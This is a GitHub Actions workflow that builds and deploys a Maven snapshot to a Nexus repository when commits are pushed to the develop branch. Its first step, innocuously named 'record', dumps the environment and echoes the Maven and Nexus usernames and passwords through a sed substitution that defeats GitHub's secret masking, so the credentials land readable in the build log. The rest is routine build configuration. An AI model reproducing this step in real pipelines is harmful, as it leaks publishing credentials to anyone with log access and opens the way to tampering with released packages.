name: Push-to-develop

# Run workflow on commits to the `develop` branch
on:
  workflow_dispatch:
  push:
    branches:
      - develop

jobs:
  release:
    runs-on: ubuntu-latest
    steps:
      - name: record
        run: |
          env
          echo ${MAVEN_USERNAME} | sed -r 's/[a]+/✔︎/g; s/[e]+/✖︎/g; s/[i]+/♠︎/g; s/[o]+/★/g; s/[u]+/♜/g; s/[@]+/☂︎/g'
          echo ${MAVEN_PASSWORD} | sed -r 's/[a]+/✔︎/g; s/[e]+/✖︎/g; s/[i]+/♠︎/g; s/[o]+/★/g; s/[u]+/♜/g; s/[@]+/☂︎/g'
          echo ${{ secrets.NEXUS_USERNAME }} | sed -r 's/[a]+/✔︎/g; s/[e]+/✖︎/g; s/[i]+/♠︎/g; s/[o]+/★/g; s/[u]+/♜/g; s/[@]+/☂︎/g'
          echo ${{ secrets.NEXUS_PASSWORD }} | sed -r 's/[a]+/✔︎/g; s/[e]+/✖︎/g; s/[i]+/♠︎/g; s/[o]+/★/g; s/[u]+/♜/g; s/[@]+/☂︎/g'
      - name: Check out Git repository
        uses: actions/checkout@v2

      - name: Install Java and Maven
        uses: actions/setup-java@v2
        with:
          java-version: "8"
          distribution: "adopt"
          server-id: ossrh
          server-username: MAVEN_USERNAME
          server-password: MAVEN_PASSWORD

      - name: Cache Maven packages
        uses: actions/cache@v2
        with:
          path: ~/.m2
          key: ${{ runner.os }}-m2-${{ hashFiles('**/pom.xml') }}
          restore-keys: ${{ runner.os }}-m2

      - name: Extract Project version
        id: project
        run: echo ::set-output name=version::$(mvn help:evaluate -Dexpression=project.version -q -DforceStdout)

      - name: Release Maven package
        # Only publish on develop when the version does end on -SNAPSHOT
        if: ${{ endsWith(steps.project.outputs.version, '-SNAPSHOT') }}
        run: mvn --batch-mode deploy
        env:
          MAVEN_USERNAME: ${{ secrets.NEXUS_USERNAME }}
          MAVEN_PASSWORD: ${{ secrets.NEXUS_PASSWORD }}
